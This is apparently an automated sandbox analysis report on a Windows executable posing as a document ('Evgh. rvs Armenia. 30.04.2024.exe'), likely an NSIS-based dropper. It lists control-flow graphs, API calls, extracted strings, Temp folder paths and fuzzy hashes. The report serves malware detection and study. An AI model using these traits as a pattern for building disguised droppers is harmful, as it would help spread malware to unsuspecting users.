                                                  control_flow_graph 670 40205e-4020c3 call 402a3a * 5 call 4057dc 683 4020c5-4020c7 call 402a3a 670->683 684 4020cc-4020e5 CoCreateInstance 670->684 683->684 686 4021bb-4021c2 684->686 687 4020eb-402101 684->687 688 4021c4-4021c9 call 401423 686->688 692 402107-402118 687->692 693 4021ad-4021b9 687->693 694 4028cf-4028de 688->694 698 402128-40212a 692->698 699 40211a-402123 692->699 693->686 701 4021ce-4021d0 693->701 702 402136-402147 698->702 703 40212c-402131 698->703 699->698 701->688 701->694 705 402156-402171 702->705 706 402149-402152 702->706 703->702 709 402173-402191 MultiByteToWideChar 705->709 710 4021a4-4021a8 705->710 706->705 709->710 711 402193-40219d 709->711 710->693 712 4021a1 711->712 712->710
                                                  APIs
                                                  • CoCreateInstance.OLE32(004073C0,?,00000001,004073B0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                                  • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073B0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten, xrefs: 0040211D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: ByteCharCreateInstanceMultiWide
                                                  • String ID: C:\Users\user\AppData\Local\Temp\Deinotherium\Anstalters\Faulty\Smallhearted115\Kommuneskatten
                                                  • API String ID: 123533781-258341099
                                                  • Opcode ID: bf6f2535c41a6e67d7fac3ee4004d5a7f515cf8657961e27ca6d10824b23052d
                                                  • Instruction ID: 73ba7e37247343007321aa60fc7c63e2173afb66a68b14033088ab5266f46407
                                                  • Opcode Fuzzy Hash: bf6f2535c41a6e67d7fac3ee4004d5a7f515cf8657961e27ca6d10824b23052d
                                                  • Instruction Fuzzy Hash: 22513A75A00208BFDF10DFA4C988A9D7BB5FF48318F20416AF915EB2D1DB799941CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 713 406344-406349 714 4063ba-4063d8 713->714 715 40634b-40637a 713->715 716 4069b0-4069c5 714->716 717 406381-406385 715->717 718 40637c-40637f 715->718 721 4069c7-4069dd 716->721 722 4069df-4069f5 716->722 719 406387-40638b 717->719 720 40638d 717->720 723 406391-406394 718->723 719->723 720->723 726 4069f8-4069ff 721->726 722->726 724 4063b2-4063b5 723->724 725 406396-40639f 723->725 729 406587-4065a5 724->729 727 4063a1 725->727 728 4063a4-4063b0 725->728 730 406a01-406a05 726->730 731 406a26-406a32 726->731 727->728 734 40641a-406448 728->734 732 4065a7-4065bb 729->732 733 4065bd-4065cf 729->733 735 406bb4-406bbe 730->735 736 406a0b-406a23 730->736 740 4061c8-4061d1 731->740 738 4065d2-4065dc 732->738 733->738 741 406464-40647e 734->741 742 40644a-406462 734->742 739 406bca-406bdd 735->739 736->731 744 4065de 738->744 745 40657f-406585 738->745 743 406be2-406be6 739->743 746 4061d7 740->746 747 406bdf 740->747 748 406481-40648b 741->748 742->748 767 406564-40657c 744->767 768 406b66-406b70 744->768 745->729 756 406523-40652d 745->756 752 406283-406287 746->752 753 4062f3-4062f7 746->753 754 4061de-4061e2 746->754 755 40631e-40633f 746->755 747->743 749 406491 748->749 750 406402-406408 748->750 773 4063e7-4063ff 749->773 774 406b4e-406b58 749->774 763 4064bb-4064c1 750->763 764 40640e-406414 750->764 758 406b33-406b3d 752->758 759 40628d-4062a6 752->759 761 406b42-406b4c 753->761 762 4062fd-406311 753->762 754->739 760 4061e8-4061f5 754->760 755->716 765 406b72-406b7c 756->765 766 406533-4066fc 756->766 758->739 769 4062a9-4062ad 759->769 760->747 772 4061fb-406241 760->772 761->739 775 406314-40631c 762->775 770 4064c3-4064e1 763->770 771 40651f 763->771 764->734 764->771 765->739 766->740 767->745 768->739 769->752 777 4062af-4062b5 769->777 778 4064e3-4064f7 770->778 779 4064f9-40650b 770->779 771->756 780 406243-406247 772->780 781 406269-40626b 772->781 773->750 774->739 775->753 775->755 782 4062b7-4062be 777->782 783 4062df-4062f1 777->783 784 40650e-406518 778->784 779->784 785 406252-406260 GlobalAlloc 780->785 786 406249-40624c GlobalFree 780->786 787 406279-406281 781->787 788 40626d-406277 781->788 789 4062c0-4062c3 GlobalFree 782->789 790 4062c9-4062d9 GlobalAlloc 782->790 783->775 784->763 791 40651a 784->791 785->747 792 406266 785->792 786->785 787->769 788->787 788->788 789->790 790->747 790->783 794 4064a0-4064b8 791->794 795 406b5a-406b64 791->795 792->781 794->763 795->739
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: df052f8500bc354d4a21ff453bca24a979c322da877604b446898ac79d7ea655
                                                  • Instruction ID: 747aed367833ce7965c7456030a986fa8c308b51e1337f5c25afca0a07e996cc
                                                  • Opcode Fuzzy Hash: df052f8500bc354d4a21ff453bca24a979c322da877604b446898ac79d7ea655
                                                  • Instruction Fuzzy Hash: 35F17670D00229CBCF28CFA8C8946ADBBB1FF44305F25816ED856BB281D7785A96CF44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(75923410,00421570,00421128,004058A0,00421128,00421128,00000000,00421128,00421128,75923410,?,C:\Users\user\AppData\Local\Temp\,004055BF,?,75923410,C:\Users\user\AppData\Local\Temp\), ref: 0040600C
                                                  • FindClose.KERNEL32(00000000), ref: 00406018
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 84c008b5a35429018b57d61e4d5c1136775b4467134940db04eeaa1c515e45d8
                                                  • Instruction ID: d1357e632777a99f3a46a744368fc942f06971bdd1fac7e5a473789d9e822290
                                                  • Opcode Fuzzy Hash: 84c008b5a35429018b57d61e4d5c1136775b4467134940db04eeaa1c515e45d8
                                                  • Instruction Fuzzy Hash: 22D012319481206BC3105B78AC0C85B7E98AF5A3303618A72F226F12F4D7349C6286AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 00402697
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: daa7385dd321edffd10cd58f8f6238ddd97ab2dfbe1096a6fb68558d51fc429f
                                                  • Instruction ID: e04ffd14ad056a7bc966bca46badc1a9d7fcc05075aa2412e3ac1a9cf71dfd33
                                                  • Opcode Fuzzy Hash: daa7385dd321edffd10cd58f8f6238ddd97ab2dfbe1096a6fb68558d51fc429f
                                                  • Instruction Fuzzy Hash: 6BF0A772508100AFE701EBB499499EE7778DB61314F60457BE241E21C1D7B849859B3A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 181 403a0f-403a21 182 403b62-403b71 181->182 183 403a27-403a2d 181->183 185 403bc0-403bd5 182->185 186 403b73-403bbb GetDlgItem * 2 call 403ee2 SetClassLongA call 40140b 182->186 183->182 184 403a33-403a3c 183->184 187 403a51-403a54 184->187 188 403a3e-403a4b SetWindowPos 184->188 190 403c15-403c1a call 403f2e 185->190 191 403bd7-403bda 185->191 186->185 193 403a56-403a68 ShowWindow 187->193 194 403a6e-403a74 187->194 188->187 198 403c1f-403c3a 190->198 196 403bdc-403be7 call 401389 191->196 197 403c0d-403c0f 191->197 193->194 199 403a90-403a93 194->199 200 403a76-403a8b DestroyWindow 194->200 196->197 218 403be9-403c08 SendMessageA 196->218 197->190 203 403eaf 197->203 204 403c43-403c49 198->204 205 403c3c-403c3e call 40140b 198->205 209 403a95-403aa1 SetWindowLongA 199->209 210 403aa6-403aac 199->210 207 403e8c-403e92 200->207 206 403eb1-403eb8 203->206 214 403e6d-403e86 DestroyWindow EndDialog 204->214 215 403c4f-403c5a 204->215 205->204 207->203 212 403e94-403e9a 207->212 209->206 216 403ab2-403ac3 GetDlgItem 210->216 217 403b4f-403b5d call 403f49 210->217 212->203 220 403e9c-403ea5 ShowWindow 212->220 214->207 215->214 221 403c60-403cad call 405d1f call 403ee2 * 3 GetDlgItem 215->221 222 403ae2-403ae5 216->222 223 403ac5-403adc SendMessageA IsWindowEnabled 216->223 217->206 218->206 220->203 251 403cb7-403cf3 ShowWindow KiUserCallbackDispatcher call 403f04 EnableWindow 221->251 252 403caf-403cb4 221->252 226 403ae7-403ae8 222->226 227 403aea-403aed 222->227 223->203 223->222 229 403b18-403b1d call 403ebb 226->229 230 403afb-403b00 227->230 231 403aef-403af5 227->231 229->217 232 403b36-403b49 SendMessageA 230->232 234 403b02-403b08 230->234 231->232 233 403af7-403af9 231->233 232->217 233->229 237 403b0a-403b10 call 40140b 234->237 238 403b1f-403b28 call 40140b 234->238 247 403b16 237->247 238->217 248 403b2a-403b34 238->248 247->229 248->247 255 403cf5-403cf6 251->255 256 403cf8 251->256 252->251 257 403cfa-403d28 GetSystemMenu EnableMenuItem SendMessageA 255->257 256->257 258 403d2a-403d3b SendMessageA 257->258 259 403d3d 257->259 260 403d43-403d7c call 403f17 call 405cfd lstrlenA call 405d1f SetWindowTextA call 401389 258->260 259->260 260->198 269 403d82-403d84 260->269 269->198 270 403d8a-403d8e 269->270 271 403d90-403d96 270->271 272 403dad-403dc1 DestroyWindow 270->272 271->203 273 403d9c-403da2 271->273 272->207 274 403dc7-403df4 CreateDialogParamA 272->274 273->198 275 403da8 273->275 274->207 276 403dfa-403e51 call 403ee2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 274->276 275->203 276->203 281 403e53-403e66 ShowWindow call 403f2e 276->281 283 403e6b 281->283 283->207
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A4B
                                                  • ShowWindow.USER32(?), ref: 00403A68
                                                  • DestroyWindow.USER32 ref: 00403A7C
                                                  • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A98
                                                  • GetDlgItem.USER32(?,?), ref: 00403AB9
                                                  • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403ACD
                                                  • IsWindowEnabled.USER32(00000000), ref: 00403AD4
                                                  • GetDlgItem.USER32(?,00000001), ref: 00403B82
                                                  • GetDlgItem.USER32(?,00000002), ref: 00403B8C
                                                  • SetClassLongA.USER32(?,000000F2,?), ref: 00403BA6
                                                  • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403BF7
                                                  • GetDlgItem.USER32(?,00000003), ref: 00403C9D
                                                  • ShowWindow.USER32(00000000,?), ref: 00403CBE
                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CD0
                                                  • EnableWindow.USER32(?,?), ref: 00403CEB
                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403D01
                                                  • EnableMenuItem.USER32(00000000), ref: 00403D08
                                                  • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D20
                                                  • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D33
                                                  • lstrlenA.KERNEL32(Nonefficient Setup: Completed,?,Nonefficient Setup: Completed,00422F20), ref: 00403D5C
                                                  • SetWindowTextA.USER32(?,Nonefficient Setup: Completed), ref: 00403D6B
                                                  • ShowWindow.USER32(?,0000000A), ref: 00403E9F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                  • String ID: Nonefficient Setup: Completed$k]
                                                  • API String ID: 3282139019-2221223368
                                                  • Opcode ID: e65e75c514bf03efa5ce6d2994b341edb8337756b2853bfd874a528499e69a5c
                                                  • Instruction ID: 59f0c632d138382d557344a1f3b7ccf8545d810693bdce96ba14c4126dbc1e18
                                                  • Opcode Fuzzy Hash: e65e75c514bf03efa5ce6d2994b341edb8337756b2853bfd874a528499e69a5c
                                                  • Instruction Fuzzy Hash: 24C1E171A04205BBDB21AF21ED84E2B3E7CFB44706B50453EF611B11E1C779A942AB6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 284 40367d-403695 call 406092 287 403697-4036a7 call 405c5b 284->287 288 4036a9-4036da call 405be4 284->288 296 4036fd-403726 call 403942 call 40585d 287->296 292 4036f2-4036f8 lstrcatA 288->292 293 4036dc-4036ed call 405be4 288->293 292->296 293->292 302 40372c-403731 296->302 303 4037ad-4037b5 call 40585d 296->303 302->303 304 403733-40374b call 405be4 302->304 308 4037c3-4037e8 LoadImageA 303->308 309 4037b7-4037be call 405d1f 303->309 310 403750-403757 304->310 312 403869-403871 call 40140b 308->312 313 4037ea-40381a RegisterClassA 308->313 309->308 310->303 314 403759-40375b 310->314 327 403873-403876 312->327 328 40387b-403886 call 403942 312->328 317 403820-403864 SystemParametersInfoA CreateWindowExA 313->317 318 403938 313->318 315 40376c-403778 lstrlenA 314->315 316 40375d-40376a call 40579a 314->316 322 4037a0-4037a8 call 40576f call 405cfd 315->322 323 40377a-403788 lstrcmpiA 315->323 316->315 317->312 321 40393a-403941 318->321 322->303 323->322 326 40378a-403794 GetFileAttributesA 323->326 330 403796-403798 326->330 331 40379a-40379b call 4057b6 326->331 327->321 337 40388c-4038a6 ShowWindow call 406028 328->337 338 40390f-403910 call 404fe8 328->338 330->322 330->331 331->322 345 4038b2-4038c4 GetClassInfoA 337->345 346 4038a8-4038ad call 406028 337->346 341 403915-403917 338->341 343 403931-403933 call 40140b 341->343 344 403919-40391f 341->344 343->318 344->327 351 403925-40392c call 40140b 344->351 349 4038c6-4038d6 GetClassInfoA RegisterClassA 345->349 350 4038dc-4038ff DialogBoxParamA call 40140b 345->350 346->345 349->350 354 403904-40390d call 4035cd 350->354 351->327 354->321
                                                  APIs
                                                    • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403147,00000009,SETUPAPI,USERENV,UXTHEME), ref: 004060A4
                                                    • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                                  • lstrcatA.KERNEL32(1033,Nonefficient Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Nonefficient Setup: Completed,00000000,00000002,75923410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe",00000000), ref: 004036F8
                                                  • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\Temp\Deinotherium,1033,Nonefficient Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Nonefficient Setup: Completed,00000000,00000002,75923410), ref: 0040376D
                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 00403780
                                                  • GetFileAttributesA.KERNEL32(: Completed), ref: 0040378B
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Deinotherium), ref: 004037D4
                                                    • Part of subcall function 00405C5B: wsprintfA.USER32 ref: 00405C68
                                                  • RegisterClassA.USER32(00422EC0), ref: 00403811
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403829
                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040385E
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403894
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,00422EC0), ref: 004038C0
                                                  • GetClassInfoA.USER32(00000000,RichEdit,00422EC0), ref: 004038CD
                                                  • RegisterClassA.USER32(00422EC0), ref: 004038D6
                                                  • DialogBoxParamA.USER32(?,00000000,00403A0F,00000000), ref: 004038F5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Deinotherium$Control Panel\Desktop\ResourceLocale$Nonefficient Setup: Completed$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                  • API String ID: 1975747703-1110214898
                                                  • Opcode ID: e5e732fa2ac6b6f30794d687317306249c7fdf90a4e561a867839475ad421bc5
                                                  • Instruction ID: 7b7c40b23c28382cce88422b139422c0b39d4688b8d1f116fbeb90bdc2aa80af
                                                  • Opcode Fuzzy Hash: e5e732fa2ac6b6f30794d687317306249c7fdf90a4e561a867839475ad421bc5
                                                  • Instruction Fuzzy Hash: E161C7B46442007ED620BF61AD45F273AACEB4474AF40847FF945B22E1C77CAD069A3E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 358 402c66-402cb4 GetTickCount GetModuleFileNameA call 405970 361 402cc0-402cee call 405cfd call 4057b6 call 405cfd GetFileSize 358->361 362 402cb6-402cbb 358->362 370 402cf4 361->370 371 402ddb-402de9 call 402c02 361->371 363 402e98-402e9c 362->363 373 402cf9-402d10 370->373 377 402deb-402dee 371->377 378 402e3e-402e43 371->378 375 402d12 373->375 376 402d14-402d1d call 40307b 373->376 375->376 384 402d23-402d2a 376->384 385 402e45-402e4d call 402c02 376->385 380 402df0-402e08 call 403091 call 40307b 377->380 381 402e12-402e3c GlobalAlloc call 403091 call 402e9f 377->381 378->363 380->378 404 402e0a-402e10 380->404 381->378 409 402e4f-402e60 381->409 389 402da6-402daa 384->389 390 402d2c-402d40 call 40592b 384->390 385->378 394 402db4-402dba 389->394 395 402dac-402db3 call 402c02 389->395 390->394 407 402d42-402d49 390->407 400 402dc9-402dd3 394->400 401 402dbc-402dc6 call 406107 394->401 395->394 400->373 408 402dd9 400->408 401->400 404->378 404->381 407->394 413 402d4b-402d52 407->413 408->371 410 402e62 409->410 411 402e68-402e6d 409->411 410->411 414 402e6e-402e74 411->414 413->394 415 402d54-402d5b 413->415 414->414 417 402e76-402e91 SetFilePointer call 40592b 414->417 415->394 416 402d5d-402d64 415->416 416->394 418 402d66-402d86 416->418 421 402e96 417->421 418->378 420 402d8c-402d90 418->420 422 402d92-402d96 420->422 423 402d98-402da0 420->423 421->363 422->408 422->423 423->394 424 402da2-402da4 423->424 424->394
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402C77
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe,00000400), ref: 00402C93
                                                    • Part of subcall function 00405970: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe,80000000,00000003), ref: 00405974
                                                    • Part of subcall function 00405970: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405996
                                                  • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe,C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe,80000000,00000003), ref: 00402CDF
                                                  Strings
                                                  • hA, xrefs: 00402CF4
                                                  • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                                  • Inst, xrefs: 00402D4B
                                                  • "C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe", xrefs: 00402C66
                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C6D
                                                  • C:\Users\user\Desktop\Evgh. rvs Armenia. 30.04.2024.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                                  • soft, xrefs: 00402D54
                                                  • Null, xrefs: 00402D5D
                                                  • Error launching installer, xrefs: 00402CB6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2068171640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2068151613.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068192504.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068210547.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2068317699.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Evgh.jbxd
                                                  Similarity
